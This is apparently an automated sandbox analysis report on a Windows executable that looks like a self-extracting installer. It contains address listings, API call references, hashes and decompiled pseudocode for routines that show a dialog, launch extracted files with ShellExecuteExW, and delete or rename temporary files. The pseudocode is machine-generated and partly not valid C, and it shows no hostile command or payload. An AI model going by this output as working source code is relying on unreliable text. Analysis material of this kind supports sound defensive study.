                                                                                                                0x00ec4625
                                                                                                                0x00ec4628
                                                                                                                0x00000000
                                                                                                                0x00ec4628
                                                                                                                0x00ec45f5
                                                                                                                0x00ec45f5
                                                                                                                0x00ec45f8
                                                                                                                0x00ec4616
                                                                                                                0x00000000
                                                                                                                0x00ec4616
                                                                                                                0x00ec45fa
                                                                                                                0x00ec45fa
                                                                                                                0x00ec45fd
                                                                                                                0x00ec4612
                                                                                                                0x00000000
                                                                                                                0x00ec4612
                                                                                                                0x00ec45ff
                                                                                                                0x00ec45ff
                                                                                                                0x00ec4602
                                                                                                                0x00ec460e
                                                                                                                0x00000000
                                                                                                                0x00ec460e
                                                                                                                0x00ec4605
                                                                                                                0x00ec4608
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec460a
                                                                                                                0x00000000
                                                                                                                0x00ec460a
                                                                                                                0x00ec42bf
                                                                                                                0x00ec42c4
                                                                                                                0x00ec42c8
                                                                                                                0x00ec42d4
                                                                                                                0x00ec42d6
                                                                                                                0x00ec42d7
                                                                                                                0x00ec42db
                                                                                                                0x00ec44d0
                                                                                                                0x00ec44d3
                                                                                                                0x00ec44da
                                                                                                                0x00ec44df
                                                                                                                0x00ec44e1
                                                                                                                0x00ec45c6
                                                                                                                0x00ec45c6
                                                                                                                0x00ec45c9
                                                                                                                0x00000000
                                                                                                                0x00ec45c9
                                                                                                                0x00ec44f3
                                                                                                                0x00ec4504
                                                                                                                0x00ec4509
                                                                                                                0x00ec450e
                                                                                                                0x00ec4510
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec4518
                                                                                                                0x00ec452b
                                                                                                                0x00ec4540
                                                                                                                0x00ec4555
                                                                                                                0x00ec456a
                                                                                                                0x00ec4582
                                                                                                                0x00ec4587
                                                                                                                0x00ec458a
                                                                                                                0x00ec458c
                                                                                                                0x00ec458e
                                                                                                                0x00ec458e
                                                                                                                0x00ec4591
                                                                                                                0x00ec4597
                                                                                                                0x00ec4597
                                                                                                                0x00ec45aa
                                                                                                                0x00ec45aa
                                                                                                                0x00ec45ac
                                                                                                                0x00ec45af
                                                                                                                0x00ec45b0
                                                                                                                0x00ec45b0
                                                                                                                0x00ec45b4
                                                                                                                0x00ec45b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec45b9
                                                                                                                0x00ec45b9
                                                                                                                0x00ec45bd
                                                                                                                0x00ec436f
                                                                                                                0x00ec436f
                                                                                                                0x00000000
                                                                                                                0x00ec436f
                                                                                                                0x00ec45c3
                                                                                                                0x00ec45c3
                                                                                                                0x00ec45b0
                                                                                                                0x00ec45b4
                                                                                                                0x00ec45b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec45b7
                                                                                                                0x00ec45b0
                                                                                                                0x00ec42e1
                                                                                                                0x00ec42e4
                                                                                                                0x00ec42e4
                                                                                                                0x00ec42e7
                                                                                                                0x00ec42ea
                                                                                                                0x00ec42f1
                                                                                                                0x00ec42f8
                                                                                                                0x00ec42ff
                                                                                                                0x00ec4306
                                                                                                                0x00ec4309
                                                                                                                0x00ec4309
                                                                                                                0x00ec430d
                                                                                                                0x00ec4313
                                                                                                                0x00ec431a
                                                                                                                0x00ec4321
                                                                                                                0x00ec4326
                                                                                                                0x00ec432b
                                                                                                                0x00ec432c
                                                                                                                0x00ec432e
                                                                                                                0x00ec4346
                                                                                                                0x00ec4346
                                                                                                                0x00000000
                                                                                                                0x00ec4346
                                                                                                                0x00ec4333
                                                                                                                0x00ec4335
                                                                                                                0x00ec433a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec433c
                                                                                                                0x00ec433e
                                                                                                                0x00ec4341
                                                                                                                0x00ec4349
                                                                                                                0x00ec4349
                                                                                                                0x00ec434a
                                                                                                                0x00ec434a
                                                                                                                0x00ec434f
                                                                                                                0x00ec4352
                                                                                                                0x00ec4354
                                                                                                                0x00ec4356
                                                                                                                0x00ec440e
                                                                                                                0x00ec4411
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec4417
                                                                                                                0x00ec4417
                                                                                                                0x00ec4417
                                                                                                                0x00ec441b
                                                                                                                0x00ec441e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec4420
                                                                                                                0x00ec4420
                                                                                                                0x00ec4424
                                                                                                                0x00ec4429
                                                                                                                0x00ec442c
                                                                                                                0x00ec4431
                                                                                                                0x00ec4432
                                                                                                                0x00ec4434
                                                                                                                0x00ec4437
                                                                                                                0x00ec4458
                                                                                                                0x00ec445a
                                                                                                                0x00ec4472
                                                                                                                0x00ec4477
                                                                                                                0x00ec447a
                                                                                                                0x00ec447d
                                                                                                                0x00ec4480
                                                                                                                0x00ec44a3
                                                                                                                0x00ec44a6
                                                                                                                0x00ec44ab
                                                                                                                0x00ec44ad
                                                                                                                0x00ec44ad
                                                                                                                0x00ec44c3
                                                                                                                0x00ec44c8
                                                                                                                0x00ec4482
                                                                                                                0x00ec448e
                                                                                                                0x00ec4496
                                                                                                                0x00ec449b
                                                                                                                0x00ec449b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec4439
                                                                                                                0x00ec4439
                                                                                                                0x00ec4439
                                                                                                                0x00ec443c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec443e
                                                                                                                0x00ec4441
                                                                                                                0x00ec4444
                                                                                                                0x00ec444c
                                                                                                                0x00ec444f
                                                                                                                0x00ec4450
                                                                                                                0x00ec4453
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec4453
                                                                                                                0x00ec4455
                                                                                                                0x00000000
                                                                                                                0x00ec4455
                                                                                                                0x00ec4426
                                                                                                                0x00ec4426
                                                                                                                0x00ec4417
                                                                                                                0x00ec4417
                                                                                                                0x00ec441b
                                                                                                                0x00ec441e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec441e
                                                                                                                0x00ec4417
                                                                                                                0x00ec436a
                                                                                                                0x00000000
                                                                                                                0x00ec436a
                                                                                                                0x00ec42ca
                                                                                                                0x00ec42ca
                                                                                                                0x00ec42ce
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec4372
                                                                                                                0x00ec4372
                                                                                                                0x00ec4372
                                                                                                                0x00ec437b
                                                                                                                0x00ec437e
                                                                                                                0x00000000
                                                                                                                0x00ec4277
                                                                                                                0x00ec4278
                                                                                                                0x00000000
                                                                                                                0x00ec427d
                                                                                                                0x00ec4275
                                                                                                                0x00ec4202
                                                                                                                0x00ec4204
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ec403d
                                                                                                                0x00ec403d
                                                                                                                0x00ec4040
                                                                                                                0x00ec4049
                                                                                                                0x00ec404e
                                                                                                                0x00ec404f
                                                                                                                0x00ec404f
                                                                                                                0x00ec4057
                                                                                                                0x00000000
                                                                                                                0x00ec4057

                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00EC3F96
                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00EC3FB7
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00EC3F78,?), ref: 00EC3FD2
                                                                                                                • __fprintf_l.LIBCMT ref: 00EC44C3
                                                                                                                  • Part of subcall function 00EC7757: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00EC337F,00000000,?,?), ref: 00EC7773
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$Pv$R$RTL$`v$a$pv$|v
                                                                                                                • API String ID: 4184910265-2376070993
                                                                                                                • Opcode ID: 2d7ff5fc6dd03734e51ab6048d6927abe689cb456dc53f13185d599861f15968
                                                                                                                • Instruction ID: 58f178aeaf62b785f144cf5366ff4c647deef40cca744148713d8d4ad9311a2e
                                                                                                                • Opcode Fuzzy Hash: 2d7ff5fc6dd03734e51ab6048d6927abe689cb456dc53f13185d599861f15968
                                                                                                                • Instruction Fuzzy Hash: 4A12DFB19002499ACB24DFA8DE51FEEB7B5FB54304F14206EF515B72C1EB729A42CB24
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED1D62, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ED1D62() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E00ECFF44(); // executed
				_t46 = GetDlgItem( *0xf0ca58, 0x68);
				_t49 =  *0xf0ca63; // 0x1
				if(_t49 == 0) {
					_t44 =  *0xf0ca4c; // 0x303f770
					E00ECDD5E(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0xee7544);
					 *0xf0ca63 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}








                                                                                                                0x00ed1d69
                                                                                                                0x00ed1d83
                                                                                                                0x00ed1d88
                                                                                                                0x00ed1d8e
                                                                                                                0x00ed1d90
                                                                                                                0x00ed1d96
                                                                                                                0x00ed1d9e
                                                                                                                0x00ed1da9
                                                                                                                0x00ed1db7
                                                                                                                0x00ed1dbd
                                                                                                                0x00ed1dbd
                                                                                                                0x00ed1dcd
                                                                                                                0x00ed1dd7
                                                                                                                0x00ed1de7
                                                                                                                0x00ed1def
                                                                                                                0x00ed1df3
                                                                                                                0x00ed1df8
                                                                                                                0x00ed1dfe
                                                                                                                0x00ed1e09
                                                                                                                0x00ed1e13
                                                                                                                0x00ed1e1b
                                                                                                                0x00ed1e1b
                                                                                                                0x00ed1e2b
                                                                                                                0x00ed1e39
                                                                                                                0x00ed1e48
                                                                                                                0x00ed1e50
                                                                                                                0x00ed1e5e
                                                                                                                0x00ed1e6f
                                                                                                                0x00ed1e6f
                                                                                                                0x00ed1e8b

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00ECFF44: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00ECFF55
                                                                                                                  • Part of subcall function 00ECFF44: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ECFF66
                                                                                                                  • Part of subcall function 00ECFF44: IsDialogMessageW.USER32(0008020E,?), ref: 00ECFF7A
                                                                                                                  • Part of subcall function 00ECFF44: TranslateMessage.USER32(?), ref: 00ECFF88
                                                                                                                  • Part of subcall function 00ECFF44: DispatchMessageW.USER32(?), ref: 00ECFF92
                                                                                                                • GetDlgItem.USER32(00000068,00F23320), ref: 00ED1D76
                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00ECF8EC,00000001,?,?,00ED0187,00EE8CF8,00F23320), ref: 00ED1D9E
                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00ED1DA9
                                                                                                                • SendMessageW.USER32(00000000,000000C2,00000000,00EE7544), ref: 00ED1DB7
                                                                                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00ED1DCD
                                                                                                                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00ED1DE7
                                                                                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00ED1E2B
                                                                                                                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00ED1E39
                                                                                                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00ED1E48
                                                                                                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00ED1E6F
                                                                                                                • SendMessageW.USER32(00000000,000000C2,00000000,00EE7E9C), ref: 00ED1E7E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                • String ID: \
                                                                                                                • API String ID: 3569833718-2967466578
                                                                                                                • Opcode ID: 4f139ca49edd3d80a886e98ec3884ceefa2b94bae9df2fd0fbccd12d3e3f3122
                                                                                                                • Instruction ID: 7e6336b07a75bf1e15a0142eb248196f4a52bfbb2d4c6805ee8242254380ff23
                                                                                                                • Opcode Fuzzy Hash: 4f139ca49edd3d80a886e98ec3884ceefa2b94bae9df2fd0fbccd12d3e3f3122
                                                                                                                • Instruction Fuzzy Hash: 2931E471245398BBE311DF20DC49FAB3FACFB82714F000618F692E61A1C7655906A7A6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2020, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 178windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E00ED2020(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, char _a52, void* _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v4;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				intOrPtr _t80;
				signed int _t81;
				signed short* _t82;
				signed short _t83;
				long _t86;
				signed short* _t87;
				void* _t88;
				signed short* _t91;
				struct HWND__* _t93;
				void* _t94;
				void* _t95;
				void* _t98;

				_t94 = __ebp;
				_t54 = 0x1040;
				E00ED3370();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E00ED8683(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E00ED4440(_t86,  &_a4, 0, _t86);
					_t80 = _a4172;
					_t98 = _t98 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t80 != 0) {
						_a8 = 0x5c0;
					}
					_t81 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_push(_t94);
					_t95 = 0x22;
					if(_t81 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t81 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t80 == 0 &&  *0xf0fa72 != _t77) {
								_a24 = 0xf0fa72;
							}
						}
						_a32 = 1;
						_t88 = E00EC3252(_t87);
						if(_t88 != 0 && E00EC7B7C(_t88, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00EC2520(_a20) != 0) {
							E00EC2FF8(_a20,  &_a64, 0x800);
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t93 = _a4160;
							if( *0xf0da68 != _t77 || _a4168 != _t77 ||  *0xf23309 != _t77) {
								if(_t93 != 0 && IsWindowVisible(_t93) != 0) {
									ShowWindow(_t93, _t77);
									_t77 = 1;
								}
								WaitForInputIdle(_a56, 0x7d0); // executed
								E00ED24B4(_a56); // executed
								if( *0xf23309 != 0 && _a4168 == 0 && GetExitCodeProcess(_a56,  &_v4) != 0) {
									_t68 = _v4;
									if(_t68 >  *0xf2330c) {
										 *0xf2330c = _t68;
									}
									 *0xf2330a = 1;
								}
							}
							CloseHandle(_a56);
							if(_t88 == 0 || E00EC7B7C(_t88, L".exe") != 0) {
								_t54 = _a4168;
								if( *0xf0da68 != 0 && _t54 == 0 &&  *0xf23309 == _t54) {
									 *0xf23310 = 0x1b58;
								}
							} else {
								_t54 = _a4168;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t93, 1);
							}
						}
						goto L55;
					}
					_t82 = _t91;
					_v0 = 0x20;
					do {
						if( *_t82 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t83 = _v0;
									_t91[_t57] = _t83;
									L10:
									if(_t91[_t57] == _t83 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t83 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t82 =  &(_t91[_t57]);
					} while ( *_t82 != _t77);
					goto L13;
				}
			}























                                                                                                                0x00ed2020
                                                                                                                0x00ed2020
                                                                                                                0x00ed2025
                                                                                                                0x00ed202c
                                                                                                                0x00ed2033
                                                                                                                0x00ed2038
                                                                                                                0x00ed2286
                                                                                                                0x00ed228e
                                                                                                                0x00ed228e
                                                                                                                0x00ed203f
                                                                                                                0x00ed204a
                                                                                                                0x00000000
                                                                                                                0x00ed2050
                                                                                                                0x00ed2053
                                                                                                                0x00ed205b
                                                                                                                0x00ed2060
                                                                                                                0x00ed2067
                                                                                                                0x00ed206a
                                                                                                                0x00ed206e
                                                                                                                0x00ed2078
                                                                                                                0x00ed207a
                                                                                                                0x00ed207a
                                                                                                                0x00ed2082
                                                                                                                0x00ed2085
                                                                                                                0x00ed2088
                                                                                                                0x00ed208b
                                                                                                                0x00ed208f
                                                                                                                0x00ed2091
                                                                                                                0x00ed2091
                                                                                                                0x00ed2093
                                                                                                                0x00ed2097
                                                                                                                0x00ed209c
                                                                                                                0x00ed20d4
                                                                                                                0x00ed20d4
                                                                                                                0x00ed20d8
                                                                                                                0x00ed20db
                                                                                                                0x00ed20e4
                                                                                                                0x00ed20ef
                                                                                                                0x00ed20ef
                                                                                                                0x00ed20e4
                                                                                                                0x00ed20f8
                                                                                                                0x00ed2105
                                                                                                                0x00ed2109
                                                                                                                0x00ed211a
                                                                                                                0x00ed211a
                                                                                                                0x00ed212d
                                                                                                                0x00ed213d
                                                                                                                0x00ed2146
                                                                                                                0x00ed2146
                                                                                                                0x00ed214f
                                                                                                                0x00ed2157
                                                                                                                0x00ed215d
                                                                                                                0x00ed216a
                                                                                                                0x00ed217f
                                                                                                                0x00ed218e
                                                                                                                0x00ed2194
                                                                                                                0x00ed2194
                                                                                                                0x00ed219f
                                                                                                                0x00ed21a9
                                                                                                                0x00ed21b5
                                                                                                                0x00ed21d4
                                                                                                                0x00ed21de
                                                                                                                0x00ed21e0
                                                                                                                0x00ed21e0
                                                                                                                0x00ed21e5
                                                                                                                0x00ed21e5
                                                                                                                0x00ed21b5
                                                                                                                0x00ed21f0
                                                                                                                0x00ed21f8
                                                                                                                0x00ed2210
                                                                                                                0x00ed2217
                                                                                                                0x00ed2225
                                                                                                                0x00ed2225
                                                                                                                0x00ed226d
                                                                                                                0x00ed226d
                                                                                                                0x00ed226d
                                                                                                                0x00ed2276
                                                                                                                0x00ed227f
                                                                                                                0x00ed227f
                                                                                                                0x00ed2276
                                                                                                                0x00000000
                                                                                                                0x00ed2285
                                                                                                                0x00ed209e
                                                                                                                0x00ed20a0
                                                                                                                0x00ed20a8
                                                                                                                0x00ed20ab
                                                                                                                0x00ed2237
                                                                                                                0x00ed2237
                                                                                                                0x00ed223c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed2235
                                                                                                                0x00ed2243
                                                                                                                0x00ed2247
                                                                                                                0x00ed20b5
                                                                                                                0x00ed20b9
                                                                                                                0x00ed2258
                                                                                                                0x00ed225c
                                                                                                                0x00ed225c
                                                                                                                0x00ed2261
                                                                                                                0x00ed2264
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ed20b9
                                                                                                                0x00ed2235
                                                                                                                0x00ed223e
                                                                                                                0x00ed20b1
                                                                                                                0x00000000
                                                                                                                0x00ed20cb
                                                                                                                0x00ed20cb
                                                                                                                0x00ed20cc
                                                                                                                0x00ed20cf
                                                                                                                0x00000000
                                                                                                                0x00ed20a8

                                                                                                                APIs
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00ED214F
                                                                                                                • IsWindowVisible.USER32(?), ref: 00ED2182
                                                                                                                • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED218E
                                                                                                                • WaitForInputIdle.USER32(?,000007D0), ref: 00ED219F
                                                                                                                • GetExitCodeProcess.KERNEL32 ref: 00ED21CA
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED21F0
                                                                                                                • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00ED227F
                                                                                                                  • Part of subcall function 00EC7B7C: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00EC2E91,?,?,?,00EC2E3F,?,-00000002,?,00000000,?), ref: 00EC7B92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$CloseCodeCompareExecuteExitHandleIdleInputProcessShellStringVisibleWait
                                                                                                                • String ID: $.exe$.inf
                                                                                                                • API String ID: 1693144567-2452507128
                                                                                                                • Opcode ID: 9806580b448582addeb6a9706980adfbbfb709b0e41176fc57b3d55607190525
                                                                                                                • Instruction ID: cdf6521d30e498db6a75f98ab0b40e4a94d55f55d553d361324ab7b30078442b
                                                                                                                • Opcode Fuzzy Hash: 9806580b448582addeb6a9706980adfbbfb709b0e41176fc57b3d55607190525
                                                                                                                • Instruction Fuzzy Hash: 2D61B6705083849ADB319F208800A6BB7F5EFA5708F04A41FF6C5B7361D7759A8BDB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED172B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 135COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 57%
                                                                                                                			E00ED172B(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t207;
				void* _t208;
				intOrPtr _t259;
				signed int _t273;
				void* _t276;
				signed int _t277;
				void* _t281;

				L0:
				while(1) {
					L0:
					_t259 = __ebx;
					if(__ebx != 1) {
						goto L110;
					}
					L94:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					__eax = GetTempPathW(0x800, __ebp - 0x7c84); // executed
					__ebp - 0x7c84 = E00EC2FC6(__eflags, __ebp - 0x7c84, 0x800);
					__eax = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L96:
						_push( *0xef14e8);
						__ebp - 0x7c84 = E00EC37E6(0xf0da6a, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E00EC2520(0xf0da6a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L95:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L97:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xf0da6a); // executed
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L162:
							_push(0x1000);
							_t195 = _t281 - 0xe; // 0xffffa36e
							_t196 = _t281 - 0xd; // 0xffffa36f
							_t197 = _t281 - 0x5c84; // 0xffff46f8
							_t198 = _t281 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t281 + 0xc)));
							_t207 = E00ECFD06();
							_t259 =  *((intOrPtr*)(_t281 + 0x10));
							 *((intOrPtr*)(_t281 + 0xc)) = _t207;
							if(_t207 != 0) {
								_t208 = _t281 - 0x5c84;
								_t276 = _t281 - 0x1bc8c;
								_t273 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00EC7B7C(_t281 - 0xfc8c,  *((intOrPtr*)(0xef1508 + _t277 * 4))) != 0) {
								_t277 = _t277 + 1;
								if(_t277 < 0xe) {
									continue;
								} else {
									goto L162;
								}
							}
							__eflags = _t277 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t277 * 4 +  &M00ED1CA9))) {
								case 0:
									L9:
									__eflags = _t259 - 2;
									if(_t259 == 2) {
										E00ECF158(_t281 - 0x7c84, 0x800);
										E00EC284C(E00EC35E2(_t281 - 0x7c84, _t281 - 0x5c84, _t281 - 0xdc8c, 0x800), _t259, _t281 - 0x8c8c, _t277);
										 *(_t281 - 4) = 0;
										E00EC2986(_t281 - 0x8c8c, _t281 - 0xdc8c);
										E00EC1AD9(_t281 - 0x3c84);
										while(1) {
											L23:
											_push(0);
											_t267 = _t281 - 0x8c8c;
											_t222 = E00EC28D9(_t281 - 0x8c8c, _t272, _t281 - 0x3c84);
											__eflags = _t222;
											if(_t222 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t281 - 0x3c84, 0);
											__eflags =  *(_t281 - 0x2c78);
											if(__eflags == 0) {
												L16:
												_t226 = GetFileAttributesW(_t281 - 0x3c84);
												__eflags = _t226 - 0xffffffff;
												if(_t226 == 0xffffffff) {
													continue;
												}
												L17:
												_t228 = DeleteFileW(_t281 - 0x3c84);
												__eflags = _t228;
												if(_t228 != 0) {
													continue;
												} else {
													_t279 = 0;
													_push(0);
													goto L20;
													L20:
													E00EC37E6(_t281 - 0x103c, 0x800, L"%s.%d.tmp", _t281 - 0x3c84);
													_t283 = _t283 + 0x14;
													_t233 = GetFileAttributesW(_t281 - 0x103c);
													__eflags = _t233 - 0xffffffff;
													if(_t233 != 0xffffffff) {
														_t279 = _t279 + 1;
														__eflags = _t279;
														_push(_t279);
														goto L20;
													} else {
														_t236 = MoveFileW(_t281 - 0x3c84, _t281 - 0x103c);
														__eflags = _t236;
														if(_t236 != 0) {
															MoveFileExW(_t281 - 0x103c, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E00EC32B6(_t267, __eflags, _t281 - 0x7c84, _t281 - 0x103c, 0x800);
											E00EC2FC6(__eflags, _t281 - 0x103c, 0x800);
											_t280 = E00ED8683(_t281 - 0x7c84);
											__eflags = _t280 - 4;
											if(_t280 < 4) {
												L14:
												_t247 = E00EC35A2(_t281 - 0x5c84);
												__eflags = _t247;
